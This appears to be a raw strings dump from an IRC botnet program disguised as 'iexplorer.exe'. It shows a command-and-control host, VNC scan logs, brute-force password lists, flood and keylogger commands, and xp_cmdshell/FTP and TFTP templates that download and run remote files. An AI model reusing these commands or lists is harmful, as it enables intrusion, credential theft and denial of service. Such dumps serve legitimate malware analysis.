www.belwue.de

www.switch.ch

www.1und1.de

verio.fr

www.utwente.nl

www.schlund.net

%s No %s thread found.

%s %s %s stopped. (%d thread(s) stopped.)

mscoree.dll

- This application cannot run using the active version of the Microsoft .NET Runtime

Please contact the application's support team for more information.

internal state. The program cannot safely continue execution and must

continue execution and must now be terminated.

GetProcessWindowStation

PeekNamedPipe

CreatePipe

KERNEL32.dll

USER32.dll

WS2_32.dll

VERSION.dll

GetCPInfo

Gt8%S

iexplorer.exe

sysconfig.dat

Software\\Microsoft\\Windows\\CurrentVersion\\Run

Software\\Microsoft\\Windows\\CurrentVersion\\RunServices

frozynv.ODIN2-VALHALL.COM

ntpass

NTPass

sql-1433

;3 #>6.&

'2, / 0&7!4-)1#

tftp.exe -i get

:.login

:!login

:.ident

:.hashin

:.secure

:.auth

login

.download

.update

getcftp

JOIN #

NICK

now an IRC Operator

paypal.com

PAYPAL.COM

e-gold.com

e-gold.co.uk

zcÁ

.9-.1::.0[.12 120|MoD.0 ].1::.9-. Server started on Port: 69, File: %System%\iexplorer.exe, Request: iexplorer.exe.

[FTP]: Server started on Port: 0, File: %System%\iexplorer.exe, Request: iexplorer.exe.

IP: 174.232.132.21:5900, Scan thread: 1, Sub-thread: 1.

IP: 174.192.67.197:5900, Scan thread: 1, Sub-thread: 2.

IP: 174.17.113.165:5900, Scan thread: 1, Sub-thread: 3.

IP: 174.47.218.244:5900, Scan thread: 1, Sub-thread: 4.

IP: 174.183.168.229:5900, Scan thread: 1, Sub-thread: 5.

IP: 174.129.103.49:5900, Scan thread: 1, Sub-thread: 6.

IP: 174.10.3.9:5900, Scan thread: 1, Sub-thread: 7.

IP: 174.142.86.244:5900, Scan thread: 1, Sub-thread: 8.

IP: 174.155.59.118:5900, Scan thread: 1, Sub-thread: 9.

IP: 174.218.161.46:5900, Scan thread: 1, Sub-thread: 10.

IP: 174.186.16.248:5900, Scan thread: 1, Sub-thread: 11.

IP: 174.2.190.18:5900, Scan thread: 1, Sub-thread: 12.

IP: 174.176.117.60:5900, Scan thread: 1, Sub-thread: 13.

IP: 174.235.21.94:5900, Scan thread: 1, Sub-thread: 14.

IP: 174.160.19.143:5900, Scan thread: 1, Sub-thread: 15.

IP: 174.123.64.19:5900, Scan thread: 1, Sub-thread: 16.

IP: 174.232.103.144:5900, Scan thread: 1, Sub-thread: 17.

IP: 174.120.81.194:5900, Scan thread: 1, Sub-thread: 18.

IP: 174.230.145.11:5900, Scan thread: 1, Sub-thread: 19.

IP: 174.185.47.196:5900, Scan thread: 1, Sub-thread: 20.

IP: 174.26.195.76:5900, Scan thread: 1, Sub-thread: 21.

IP: 174.113.201.228:5900, Scan thread: 1, Sub-thread: 22.

IP: 174.161.240.130:5900, Scan thread: 1, Sub-thread: 23.

IP: 174.68.162.196:5900, Scan thread: 1, Sub-thread: 24.

IP: 174.240.21.27:5900, Scan thread: 1, Sub-thread: 25.

IP: 174.78.240.230:5900, Scan thread: 1, Sub-thread: 26.

IP: 174.221.51.84:5900, Scan thread: 1, Sub-thread: 27.

IP: 174.172.49.199:5900, Scan thread: 1, Sub-thread: 28.

IP: 174.80.79.203:5900, Scan thread: 1, Sub-thread: 29.

IP: 174.41.2.54:5900, Scan thread: 1, Sub-thread: 30.

IP: 174.56.21.84:5900, Scan thread: 1, Sub-thread: 31.

IP: 174.20.215.201:5900, Scan thread: 1, Sub-thread: 32.

IP: 174.151.152.169:5900, Scan thread: 1, Sub-thread: 33.

IP: 174.190.244.114:5900, Scan thread: 1, Sub-thread: 34.

IP: 174.113.51.166:5900, Scan thread: 1, Sub-thread: 35.

IP: 174.207.104.3:5900, Scan thread: 1, Sub-thread: 36.

IP: 174.22.77.143:5900, Scan thread: 1, Sub-thread: 37.

IP: 174.255.156.151:5900, Scan thread: 1, Sub-thread: 38.

IP: 174.6.52.9:5900, Scan thread: 1, Sub-thread: 39.

IP: 174.91.208.247:5900, Scan thread: 1, Sub-thread: 40.

IP: 174.209.73.225:5900, Scan thread: 1, Sub-thread: 41.

IP: 174.88.29.10:5900, Scan thread: 1, Sub-thread: 42.

IP: 174.203.109.146:5900, Scan thread: 1, Sub-thread: 43.

IP: 174.141.108.194:5900, Scan thread: 1, Sub-thread: 44.

IP: 174.245.230.10:5900, Scan thread: 1, Sub-thread: 45.

IP: 174.118.146.145:5900, Scan thread: 1, Sub-thread: 46.

IP: 174.81.255.188:5900, Scan thread: 1, Sub-thread: 47.

IP: 174.56.85.253:5900, Scan thread: 1, Sub-thread: 48.

IP: 174.155.132.119:5900, Scan thread: 1, Sub-thread: 49.

IP: 174.14.69.176:5900, Scan thread: 1, Sub-thread: 50.

IP: 174.177.121.98:5900, Scan thread: 1, Sub-thread: 51.

IP: 174.153.155.251:5900, Scan thread: 1, Sub-thread: 52.

IP: 174.115.229.98:5900, Scan thread: 1, Sub-thread: 53.

IP: 174.60.150.120:5900, Scan thread: 1, Sub-thread: 54.

IP: 174.1.252.92:5900, Scan thread: 1, Sub-thread: 55.

IP: 174.125.33.167:5900, Scan thread: 1, Sub-thread: 56.

IP: 174.131.213.143:5900, Scan thread: 1, Sub-thread: 57.

IP: 174.177.182.162:5900, Scan thread: 1, Sub-thread: 58.

IP: 174.234.58.135:5900, Scan thread: 1, Sub-thread: 59.

IP: 174.119.118.141:5900, Scan thread: 1, Sub-thread: 60.

IP: 174.121.252.116:5900, Scan thread: 1, Sub-thread: 61.

IP: 174.33.193.116:5900, Scan thread: 1, Sub-thread: 62.

IP: 174.171.4.233:5900, Scan thread: 1, Sub-thread: 63.

IP: 174.193.253.142:5900, Scan thread: 1, Sub-thread: 64.

IP: 174.220.36.228:5900, Scan thread: 1, Sub-thread: 65.

IP: 174.243.166.196:5900, Scan thread: 1, Sub-thread: 66.

IP: 174.142.254.193:5900, Scan thread: 1, Sub-thread: 67.

IP: 174.177.245.125:5900, Scan thread: 1, Sub-thread: 68.

IP: 174.2.176.240:5900, Scan thread: 1, Sub-thread: 69.

IP: 174.236.13.135:5900, Scan thread: 1, Sub-thread: 70.

IP: 174.249.151.8:5900, Scan thread: 1, Sub-thread: 71.

IP: 174.179.207.158:5900, Scan thread: 1, Sub-thread: 72.

IP: 174.155.244.207:5900, Scan thread: 1, Sub-thread: 73.

IP: 174.222.117.213:5900, Scan thread: 1, Sub-thread: 74.

IP: 174.138.75.65:5900, Scan thread: 1, Sub-thread: 75.

IP: 174.214.79.105:5900, Scan thread: 1, Sub-thread: 76.

IP: 174.240.14.140:5900, Scan thread: 1, Sub-thread: 77.

IP: 174.192.215.37:5900, Scan thread: 1, Sub-thread: 78.

IP: 174.67.53.231:5900, Scan thread: 1, Sub-thread: 79.

IP: 174.202.144.236:5900, Scan thread: 1, Sub-thread: 80.

IP: 174.129.120.214:5900, Scan thread: 1, Sub-thread: 81.

IP: 174.2.247.219:5900, Scan thread: 1, Sub-thread: 82.

IP: 174.100.22.211:5900, Scan thread: 1, Sub-thread: 83.

IP: 174.179.61.214:5900, Scan thread: 1, Sub-thread: 84.

IP: 174.32.39.235:5900, Scan thread: 1, Sub-thread: 85.

IP: 174.209.176.168:5900, Scan thread: 1, Sub-thread: 86.

IP: 174.133.17.234:5900, Scan thread: 1, Sub-thread: 87.

IP: 174.43.74.109:5900, Scan thread: 1, Sub-thread: 88.

IP: 174.87.65.63:5900, Scan thread: 1, Sub-thread: 89.

IP: 174.152.34.126:5900, Scan thread: 1, Sub-thread: 90.

IP: 174.246.18.227:5900, Scan thread: 1, Sub-thread: 91.

IP: 174.152.5.160:5900, Scan thread: 1, Sub-thread: 92.

IP: 174.178.255.210:5900, Scan thread: 1, Sub-thread: 93.

IP: 174.39.243.213:5900, Scan thread: 1, Sub-thread: 94.

IP: 174.91.234.229:5900, Scan thread: 1, Sub-thread: 95.

IP: 174.175.120.3:5900, Scan thread: 1, Sub-thread: 96.

IP: 174.130.249.102:5900, Scan thread: 1, Sub-thread: 97.

IP: 174.241.233.228:5900, Scan thread: 1, Sub-thread: 98.

IP: 174.94.249.242:5900, Scan thread: 1, Sub-thread: 99.

IP: 174.140.245.149:5900, Scan thread: 1, Sub-thread: 100.

IP: 174.72.123.213:5900, Scan thread: 1, Sub-thread: 101.

IP: 174.30.33.213:5900, Scan thread: 1, Sub-thread: 102.

IP: 174.135.26.105:5900, Scan thread: 1, Sub-thread: 103.

IP: 174.100.237.108:5900, Scan thread: 1, Sub-thread: 104.

IP: 174.103.182.177:5900, Scan thread: 1, Sub-thread: 105.

IP: 174.108.75.215:5900, Scan thread: 1, Sub-thread: 106.

IP: 174.42.149.25:5900, Scan thread: 1, Sub-thread: 107.

IP: 174.124.0.165:5900, Scan thread: 1, Sub-thread: 108.

IP: 174.214.40.212:5900, Scan thread: 1, Sub-thread: 109.

IP: 174.230.5.182:5900, Scan thread: 1, Sub-thread: 110.

IP: 174.111.55.103:5900, Scan thread: 1, Sub-thread: 111.

IP: 174.11.251.175:5900, Scan thread: 1, Sub-thread: 112.

IP: 174.211.198.6:5900, Scan thread: 1, Sub-thread: 113.

IP: 174.107.203.121:5900, Scan thread: 1, Sub-thread: 114.

IP: 174.119.119.136:5900, Scan thread: 1, Sub-thread: 115.

IP: 174.93.94.90:5900, Scan thread: 1, Sub-thread: 116.

IP: 174.125.242.8:5900, Scan thread: 1, Sub-thread: 117.

IP: 174.158.62.34:5900, Scan thread: 1, Sub-thread: 118.

IP: 174.153.239.170:5900, Scan thread: 1, Sub-thread: 119.

IP: 174.5.186.1:5900, Scan thread: 1, Sub-thread: 120.

IP: 174.212.220.116:5900, Scan thread: 1, Sub-thread: 121.

IP: 174.213.166.101:5900, Scan thread: 1, Sub-thread: 122.

IP: 174.26.237.47:5900, Scan thread: 1, Sub-thread: 123.

IP: 174.12.231.242:5900, Scan thread: 1, Sub-thread: 124.

IP: 174.179.119.98:5900, Scan thread: 1, Sub-thread: 125.

IP: 174.211.225.95:5900, Scan thread: 1, Sub-thread: 126.

IP: 174.64.217.110:5900, Scan thread: 1, Sub-thread: 127.

IP: 174.184.103.41:5900, Scan thread: 1, Sub-thread: 128.

IP: 174.13.172.64:5900, Scan thread: 1, Sub-thread: 129.

IP: 174.203.22.69:5900, Scan thread: 1, Sub-thread: 130.

IP: 174.19.232.180:5900, Scan thread: 1, Sub-thread: 131.

IP: 174.28.239.184:5900, Scan thread: 1, Sub-thread: 132.

IP: 174.251.205.71:5900, Scan thread: 1, Sub-thread: 133.

IP: 174.107.192.248:5900, Scan thread: 1, Sub-thread: 134.

IP: 174.169.41.73:5900, Scan thread: 1, Sub-thread: 135.

IP: 174.69.231.137:5900, Scan thread: 1, Sub-thread: 136.

IP: 174.165.66.183:5900, Scan thread: 1, Sub-thread: 137.

IP: 174.229.164.119:5900, Scan thread: 1, Sub-thread: 138.

IP: 174.229.24.200:5900, Scan thread: 1, Sub-thread: 139.

IP: 174.20.15.247:5900, Scan thread: 1, Sub-thread: 140.

IP: 174.224.224.66:5900, Scan thread: 1, Sub-thread: 141.

IP: 174.255.99.198:5900, Scan thread: 1, Sub-thread: 142.

IP: 174.205.41.48:5900, Scan thread: 1, Sub-thread: 143.

IP: 174.209.74.121:5900, Scan thread: 1, Sub-thread: 144.

IP: 174.199.246.213:5900, Scan thread: 1, Sub-thread: 145.

IP: 174.98.59.128:5900, Scan thread: 1, Sub-thread: 146.

IP: 174.34.238.62:5900, Scan thread: 1, Sub-thread: 147.

IP: 174.240.58.51:5900, Scan thread: 1, Sub-thread: 148.

IP: 174.99.20.131:5900, Scan thread: 1, Sub-thread: 149.

IP: 174.34.130.179:5900, Scan thread: 1, Sub-thread: 150.

IP: 174.178.211.78:5900, Scan thread: 1, Sub-thread: 151.

IP: 174.199.155.221:5900, Scan thread: 1, Sub-thread: 152.

IP: 174.13.60.103:5900, Scan thread: 1, Sub-thread: 153.

IP: 174.80.227.174:5900, Scan thread: 1, Sub-thread: 154.

IP: 174.138.45.250:5900, Scan thread: 1, Sub-thread: 155.

IP: 174.159.42.130:5900, Scan thread: 1, Sub-thread: 156.

IP: 174.52.202.219:5900, Scan thread: 1, Sub-thread: 157.

IP: 174.189.167.33:5900, Scan thread: 1, Sub-thread: 158.

IP: 174.84.9.193:5900, Scan thread: 1, Sub-thread: 159.

IP: 174.104.179.124:5900, Scan thread: 1, Sub-thread: 160.

IP: 174.81.130.151:5900, Scan thread: 1, Sub-thread: 161.

IP: 174.178.29.227:5900, Scan thread: 1, Sub-thread: 162.

IP: 174.79.76.14:5900, Scan thread: 1, Sub-thread: 163.

IP: 174.5.231.8:5900, Scan thread: 1, Sub-thread: 164.

IP: 174.43.3.165:5900, Scan thread: 1, Sub-thread: 165.

IP: 174.32.9.192:5900, Scan thread: 1, Sub-thread: 166.

IP: 174.152.44.125:5900, Scan thread: 1, Sub-thread: 167.

IP: 174.126.75.153:5900, Scan thread: 1, Sub-thread: 168.

IP: 174.27.213.7:5900, Scan thread: 1, Sub-thread: 169.

IP: 174.201.145.20:5900, Scan thread: 1, Sub-thread: 170.

IP: 174.172.23.32:5900, Scan thread: 1, Sub-thread: 171.

IP: 174.57.3.30:5900, Scan thread: 1, Sub-thread: 172.

IP: 174.234.170.240:5900, Scan thread: 1, Sub-thread: 173.

IP: 174.114.91.136:5900, Scan thread: 1, Sub-thread: 174.

IP: 174.19.210.38:5900, Scan thread: 1, Sub-thread: 175.

IP: 174.80.191.235:5900, Scan thread: 1, Sub-thread: 176.

IP: 174.80.114.244:5900, Scan thread: 1, Sub-thread: 177.

IP: 174.34.197.191:5900, Scan thread: 1, Sub-thread: 178.

IP: 174.153.180.14:5900, Scan thread: 1, Sub-thread: 179.

IP: 174.37.154.127:5900, Scan thread: 1, Sub-thread: 180.

IP: 174.230.62.26:5900, Scan thread: 1, Sub-thread: 181.

IP: 174.12.155.154:5900, Scan thread: 1, Sub-thread: 182.

IP: 174.48.165.189:5900, Scan thread: 1, Sub-thread: 183.

IP: 174.57.21.18:5900, Scan thread: 1, Sub-thread: 184.

IP: 174.188.0.195:5900, Scan thread: 1, Sub-thread: 185.

IP: 174.185.166.204:5900, Scan thread: 1, Sub-thread: 186.

IP: 174.39.203.34:5900, Scan thread: 1, Sub-thread: 187.

IP: 174.140.176.118:5900, Scan thread: 1, Sub-thread: 188.

IP: 174.3.241.182:5900, Scan thread: 1, Sub-thread: 189.

IP: 174.22.185.205:5900, Scan thread: 1, Sub-thread: 190.

IP: 174.231.109.194:5900, Scan thread: 1, Sub-thread: 191.

IP: 174.25.13.209:5900, Scan thread: 1, Sub-thread: 192.

IP: 174.151.35.149:5900, Scan thread: 1, Sub-thread: 193.

IP: 174.85.170.219:5900, Scan thread: 1, Sub-thread: 194.

IP: 174.178.22.251:5900, Scan thread: 1, Sub-thread: 195.

IP: 174.132.137.37:5900, Scan thread: 1, Sub-thread: 196.

IP: 174.127.156.6:5900, Scan thread: 1, Sub-thread: 197.

IP: 174.168.67.146:5900, Scan thread: 1, Sub-thread: 198.

IP: 174.11.174.18:5900, Scan thread: 1, Sub-thread: 199.

IP: 174.209.151.151:5900, Scan thread: 1, Sub-thread: 200.

[07-30-2014 01:51:04] [FTP]: Server started on Port: 0, File: %System%\iexplorer.exe, Request: iexplorer.exe.

exe, Re[07-30-2014 01:51:04] .9-.1::.0[.12 120|MoD.0 ].1::.9-. Server started on Port: 69, File: %System%\iexplorer.exe, R

[07-30-2014 01:51:04] Joined channel: ##!v!##

[07-30-2014 01:51:03] Connected to frozynv.ODIN2-VALHALL.COM

%System%\iexplorer.exe

iexplorer.exe_1652_rwx_00400000_0007B000:

.text

`.rdata

@.data

tTSSh,

YYu.jWX

uDPh

GWSSh

t1SSSSh

u.hpfB

(msql)

Trying: (%s:%d) user: (%s/%s).

IP: %s

EXEC master..xp_cmdshell '%s'

EXEC master..xp_cmdshell 'del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s&del eq

DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s

winpass

sqlpassoainstall

databasepassword

databasepass

dbpassword

dbpass

domainpassword

domainpass

loginpass

login

windows

1234567890

123456789

12345678

1234567

pass1234

passwd

password

password1

Windows XP (SP0 SP1)

Windows NT4, 2000 (SP0-SP4)

\\%s\pipe\browser

\\%s\ipc$

sqlpass

%s %s %s User: (%s) Pass: (%s)

(no password)

%s\%s\%s

c$\windows\system32

%s\ipc$

99999999

21122112

00000000

Password

newpass

passe

!@#$%^&*

~!@#$%^&

monkey

7654321

87654321

%systemroot%\system32\cmd.exe

VNC%d.%d %s: %s - [NoPassword]

VNC%d.%d %s: %s - %s

VNC%d.%d %s: %s - [AuthBypass]

RFB d.d

del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s &del eq

port

nick

join

tftp

rndnick

httpstop

opencmd

cmdstop

rcmd

httpcon

keylog

*@im.batman

[%.2d-%.2d-M %.2d:%.2d:%.2d] %s

%s Error: %s <%d>.

explorer.exe

%s %s

%%comspec%% /c %s %s

del "%s"

%sdel.bat

%s %s :%s

PRIVMSG

PRIVMSG %s :%s

%s Failed to start IO thread, error %d

cmd.exe

%s: %s (%s)

The following Windows services are registered:

%s User info error: <%ld>

Units Per Week: %d

Max. Storage: %d

User's Language: %d

Country Code: %d

Workstations: %S

Logon Server: %S

Last Logoff: %d

Last Logon: %d

Number of Logins: %d

Bad Password Count: %d

Password Age: %d

Parameters: %S

Home Directory: %S

Auth Flags: %d

Privilege Level: %s

Comment: %S

User Comment: %S

Full Name: %S

Account: %S

The password is shorter than required (or does not meet the password policy requirement.)

The operation is allowed only on the primary domain controller of the domain.

This network request is not supported.

%s %s <Server: %S> <Message: %S></Message:></Server:>

%s Message sent successfully

%s Not supported by this system

%s Unable to allocation ARP cache

%s Error getting ARP cache %d

%s ARP cache is empty

%s Error getting ARP cache %d

%d.%d.%d.%d

%s %s HTTP/1.1

Referer: %s

Host: %s

%s %s Drive (%s): %s total, %s free, %s available.

%s %s Drive (%s): Failed to stat, device not ready.

%s (%d)

%s Process list failed

%s Process list completed

%s Listing processes:

%s Netapi32.dll couldn't be loaded

%s Network shares deleted

%s Failed to delete '%S' share.

%s Share '%S' deleted.

%s Failed to delete '%s' share.

%s Share '%s' deleted.

%s Advapi32.dll couldn't be loaded

%s Failed to open IPC$ Restriction registry key

%s Restricted access to the IPC$ Share

%s Failed to restrict access to the IPC$ Share

%s Failed to open DCOM registry key

%s DCOM disabled

%s Disable DCOM failed

%s Network shares added

%s Failed to add '%s' share.

%s Share '%s' added.

%s Failed to open IPC$ restriction registry key

%s Unrestricted access to the IPC$ Share

%s Failed to unrestrict access to the IPC$ Share

%s DCOM enabled

%s Enable DCOM failed

%s Transfer Complete On %s Executing ::(

%s Error: socket() failed, returned: %d

%s Failed to send to Remote command shell

%s Failed to open remote command shell

%s Failed to open socket

%s Transfer complete to IP: %s Filename: %s (%s bytes)

%s Unable to open socket

.DCC SEND %s %i %i %i.

%s File doesn't exist

%s Failed to bind to socket

%s Failed to create socket

%s Transfer complete from IP: %s Filename: %s (%s bytes)

%s Socket error

%s Error opening socket

%s Error opening file for writing

%s Error unable to write file to disk

%d. %s = %s

%s IP: %s Port: %d is open

IP: %s Port: %d

%s Bad URL, or DNS Error: %s

%s Update failed: Error executing file: %s

%s Downloaded %.1fKB to %s @ %.1fKB/sec. Updating

%s Opened: %s

%s Downloaded %.1f KB to %s @ %.1f KB/sec.

A%s CRC Failed (%d != %d)

%s Filesize is incorrect: (%d != %d).

%s Update: %s (%dKB transferred)

%s File download: %s (%dKB transferred)

%s Couldn't open file: %s

%s %s: No service specified

%s Error with service: '%s'. %s

%s %s service: '%s'.

%s %s: No share specified

%s %s share: '%s'.

%s %s: Error with share: '%s'. %s

%s Share list error: %s <%ld>

%s %s: No username specified

%s %s: Error with username: '%s'. %s

%s %s username: '%s'

Total users found: %d.

%s An access violation has occured

%s User list error: %s <%ld>

PRIVMSG %s :Found %s Files and %s Directories

"><CODE>%s</CODE>

PRIVMSG %s :%-31s %-21s (%s bytes)

"><CODE>%s/</CODE>

%s%s/

<TD WIDTH="%d"><A HREF="</pre><pre>PRIVMSG %s :%-31s %-21s</pre><pre>%2.2d/%2.2d/M %2.2d:%2.2d %s</pre><pre><TD COLSPAN=" 3="3"><CODE>Parent Directory</CODE></A></TD>

Searching for: %s

<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>

<H1>Index of %s</H1>

<TITLE>Index of %s</TITLE>

PRIVMSG %s :Searching for: %s

%s List complete.

HTTP/1.0 200 OK

Content-Type: %s

Date: %s %s GMT

Last-Modified: %s %s GMT

Expires: %s %s GMT

%s Failed to start worker thread, error %d

%s Worker thread of server thread: %d

%s Error: server failed, returned %d

MODE %s %s

USERHOST %s

[SOCKS4]: Failed to start server thread, error: <%d>.

[SOCKS4]: Server started on: %s:%d.

%s Failed to start secure thread, error %d

%s %s System

[DDoS]: Failed to start flood thread, error: <%d>.

[DDoS]: Flooding: (%s:%s) for %s seconds.

[SYN]: Failed to start flood thread, error: <%d>.

[SYN]: Flooding: (%s:%s) for %s seconds.

[ICMP]: Failed to start flood thread, error: <%d>.

[ICMP]: Flooding: (%s) for %s seconds.

[UDP]: Failed to start flood thread, error: <%d>.

[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).

ICMP.dll not available

[PING]: Failed to start flood thread, error: <%d>.

[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).

[TCP]: Invalid flood time must be greater than 0.

[TCP]: Failed to start flood thread, error: <%d>.

[TCP]: %s %s flooding: (%s:%s) for %s seconds.

[TCP]: Invalid flood type specified.

%s Uploading file: %s to: %s failed

%s Uploading file: %s to: %s

ftp.exe

-s:%s

open %s

put %s

%s\%i%i%i.dll

%s File not found: %s

tcpflood

udpflood

%s failed to start, no range specified

%s failed to start, syntax is invalid

%s already %d threads. too many specified

%s Failed to start, no range specified

%s Failed to start, syntax is invalid

%s Failed to start thread, error: %d

%s %s Method started at %s :%s for %d minutes %d delay %d threads

%s Already %d threads. Too many specified.

%s Failed to start, thread, error %d

%s Started: %s:%d with delay: %d(ms)

%s Downloading URL: %s to: %s

%s Rename: '%s' to: '%s'

%s Couldn't execute file

%s ID must be different than current running process

%s Failed to start download thread, error %d

%s Downloading update from: %s

%s%s.exe

ddos.random

ddos.ack

ddos.syn

%s Repeat not allowed in command line: %s

%s Repeat: %s

Mode change: %s

MODE %s

Action: %s: %.

ACTION %s

Privmsg: %s: %s

%s Alias added: %s

%s Gethost: %s

%s Unable to extract Gethost command

%s Gethost: %s , Command: %s

%s %s %s :%s

%s Command unknown

%s No message specified

%s User list failed

%s User list completed

%s Share list failed

%s Share list completed

%s Service list failed

%s Service list complete.

%s Failed to load advapi32.dll or netapi32.dll

[KEYLOG]: Failed to start logging thread, error: <%d>.

[KEYLOG]: Key logger active.

[KEYLOG]: Already running.

[KEYLOG]: No key logger thread found.

[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)

[PSNIFF]: Carnivore stopped. (%d thread(s) stopped.)

[PSNIFF]: Failed to start sniffer thread, error: <%d>.

%s Read file failed: %s

%s Read file complete: %s

%s Commands: %s

%s Error sending to remote shell

%s Command sent

%s Client not open

List: %s

%s Send File: %s, User: %s

%s Deleted '%s'

%s Failed to terminate process ID: %s

%s Process killed ID: %s

%s Failed to terminate process: %s

%s Process killed: %s

%s Couldn't resolve hostname

%s Lookup: %s -> %s

%s Server changed to: '%s'

%s File opened: %s

%s Prefix changed to: '%c'

%s Failed to kill thread: %s

%s Killed thread: %s

%s No active threads found

%s Stopped: %d thread(s)

IRC Raw: %s

Parted channel: '%s'.

PART %s

Joined channel: '%s'.

Nick changed to: '%s'.

%s Currently %d Threads

%s Crashing bot

%s TfTp Server started on Port: %d, File: %s, Request: %s

%s Already running

%s Failed to start server thread, error %d

%s Server listening on IP: %s:%d, Directory: %s\.

%s Failed to load dnsapi.dll

%s Failed to flush DNS cache

%s DNS cache flushed

%s Failed to flush ARP cache

%s ARP cache flushed

Login list complete

%d. %s

%s Remote shell ready

%s Couldn't open remote shell

%s Remote shell already running

%s Uptime: %s

%s Failed to start listing thread, error %d

%s Proccess list

%s Failed to start listing thread, error %d

%s Failed to start list thread, error %d

%s Bot ID: %s

%s Status: Ready. Bot Uptime: %s

QUIT :%s

[TFTP]

tftpstop

UDP flood

udpstop

ddos.stop

%s Invalid login slot number: %d

%s No user logged in at slot: %d

%s User %s logged out.

%s Random nick change: %s

$rndnick

User: %s logged in

%s *Failed host auth by: (%s!%s)

NOTICE %s :Host Auth failed (%s!%s).

%s *Failed pass auth by: (%s!%s)

NOTICE %s :Your attempt has been logged.

NOTICE %s :Pass auth failed (%s!%s).

NOTICE %s : Password(arg) = '%s'

NOTICE %s : Password(enc) = '%s'

NOTICE %s : Password = '%s'

NOTICE %s : Password(before) = '%s'

NOTICE %s : Authost = '%s'

NOTICE %s : Nickconst = '%s'

NOTICE %s : Channel = '%s'

NOTICE %s : Server = '%s'

NOTICE %s : Version = '%s'

NOTICE %s : Id = '%s'

%s Chat failed by unauthorized user: %s

%s Chat already active with user: %s

%s Failed to start chat thread, error %d

%s Chat from user: %s

%s Receive file: '%s' failed from unauthorized user: %s.

NOTICE %s :

PING %s

VERSION %s

%s Failed to start transfer thread, error %d

%s Receive file: '%s' from user: %s.

%s User: %s logged out

Joined channel: %s

:%s%s

NICK

NOTICE %s :%s

%s User %s logged out

NICK %s

JOIN %s %s

PONG %s

USER %s 0 0 :%s

PASS %s

Connected to %s

%s Bot started

%s %d "%s"

%s\%s

Total: %d in %s

[%s]: %d,

tftp -i %s get %s &%s

%s Scan not active.

%s Current IP: %s

[FTP]: Failed to start server, error: <%d>.

[FTP]: Server started on Port: %d, File: %s, Request: %s.

%s Failed to start server, error: <%d>.

%s Server started on Port: %d, File: %s, Request: %s.

IP: %s, Port %d is open.

IP: %s:%d, Scan thread: %d, Sub-thread: %d.

%s Finished at %s:%d after %d minute(s) of scanning.

Failed to start worker thread, error: <%d>.

%s:%d, Scan thread: %d, Sub-thread: %d.

-[DDoS]: Send error: <%d>.

IP: %s (%s).

200 PORT command successful.

%s.%s.%s.%s

PORT

425 Passive not supported on this server

215 StnyFtpd

331 Password required

220 StnyFtpd 0wns j0

[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.

[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).

[ICMP]: Error: setsockopt() failed, returned: <%d>.

[ICMP]: Error: socket() failed, returned: <%d>.

[KEYLOG]: %s

[%d-%d-%d %d:%d:%d] %s

%s (Return) (%s)

%s (Buffer full) (%s)

%s (Changed Windows: %s)

SQLDisconnect

SQLFreeHandle

SQLAllocHandle

SQLExecDirect

SQLSetEnvAttr

SQLDriverConnect

odbc32.dll

ShellExecuteA

shell32.dll

mpr.dll

iphlpapi.dll

dnsapi.dll

netapi32.dll

icmp.dll

Mozilla/4.0 (compatible)

InternetCrackUrlA

InternetOpenUrlA

HttpSendRequestA

HttpOpenRequestA

wininet.dll

ws2_32.dll

gdi32.dll

RegCloseKey

RegCreateKeyExA

RegOpenKeyExA

advapi32.dll

GetKeyState

GetAsyncKeyState

ExitWindowsEx

user32.dll

kernel32.dll

Avicap32.dll failed. <%d>

Odbc32.dll failed. <%d>

Shell32.dll failed. <%d>

Mpr32.dll failed. <%d>

Iphlpapi.dll failed. <%d>

Dnsapi.dll failed. <%d>

Netapi32.dll failed. <%d>

Icmp.dll failed. <%d>

Wininet.dll failed. <%d>

Ws2_32.dll failed. <%d>

Gdi32.dll failed. <%d>

Advapi32.dll failed. <%d>

User32.dll failed. <%d>

Kernel32.dll failed. <%d>

%s.bck

sfc_os.dll

TCPIP.SYS fixed, version %d.

%s\drivers\tcpip.sys

Patching tcpip.sys.

[PING]: Finished sending pings to %s.

[PING]: Error sending pings to %s.

[UDP]: Finished sending packets to %s.

[UDP]: Error sending pings to %s.

https:/

http:/

[pStore] %s %s:%s

pstorec.dll

|%.2d|%s|

[%d]%s

[%s|%s|%s|%s]-

Ý %dh %dm

[PSNIFF]: Error: recv() failed, returned: <%d>

[PSNIFF]: Suspicious %s packet from: %s:%d - %s.

[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.

[PSNIFF]: Error: bind() failed, returned: <%d>.

[PSNIFF]: Error: socket() failed, returned: <%d>.

[SOCKS4]: Error: Failed to connect to target, returned: <%d>.

[SOCKS4]: Error: Failed to open socket(), returned: <%d>.

[SOCKS4]: Authentication failed. Remote userid: %s != %s.

[SOCKS4]: Failed to start server on Port %d.

[SOCKS4]: Failed to start client thread, error: <%d>.

[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.

[SYN]: Send error: <%d>.

%s [CpU]: %I64uMHz. [RaM] %sKB total, %sKB free. [DiSk] %s total, %s free. [Os] Windows %s (%d.%d, Build %d). [SyS DiR] %s. [HoStNaMe] %s (%s). [CuRrEnT uSeR] %s. [DaTe] %s. [TiMe] %s. [UpTiMe] %s

%s (%s)

%s [TyPe] %s (%s). [Ip AdDrEsS] %s. [HoStNaMe] %s.

[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.

[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).

[TCP]: Invalid target IP.

[TCP]: Error: setsockopt() failed, returned: <%d>.

[TCP]: Error: socket() failed, returned: <%d>.

:POST / HTTP/1.0

Content-Length: %d

: Europe[ %d kbit/s] USA[ %d kbit/s] Asia[ %d kbit/s] Average[ %d kbit/s]

www.google.co.jp

yahoo.co.jp

www.nifty.com

www.d1asia.com

www.st.lib.keio.ac.jp

www.lib.nthu.edu.tw

www.google.com

www.easynews.com

www.above.net

